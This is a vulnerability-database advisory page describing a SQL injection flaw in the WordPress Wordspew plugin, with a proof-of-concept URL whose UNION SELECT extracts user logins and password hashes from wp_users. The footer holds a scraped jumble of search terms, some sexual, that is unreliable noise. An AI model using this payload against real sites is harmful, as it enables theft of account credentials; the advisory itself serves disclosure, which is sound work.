about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WordPress Plugin Wordspew SQL Injection Vulnerability


Title WordPress Plugin Wordspew SQL Injection Vulnerability
Published 2008-02-04-12:00AM
Updated 2008-02-04-09:17PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  S@BUN discovered this vulnerability.
Vulnerable  Wordspew Wordspew 0
Not Vulnerable  
Code  An attacker can exploit this issue via a browser.The following proof-of-concept URI is available:http://www.example.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 21:15:01 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sakkilasex %252Fshowt www.gzwenj hairy taco SEXY VIDEO priyanka c Juhi chawl Half sex vedio www.lv87.c 200 /compo php-...at_ ts00.com www.indais sex vedio components www.baby** telecharge FreeBSD 5. EROTICHIND Cerita dew A...z gall www.36171. fusion www.pvpwm. shakeela h southindia Girl on Gi phpBB port .ani www.ykela. 0123t.cn Happyhenta extcal Www.Xlxx.C nina merce news for c news for c cisco ssh Tamilhot Sexy Photo upload beb /search/ex netbsd 1.6 FreeBSD 5. Powered b Crack+Data shijiazhua video de n SAXCYGIRL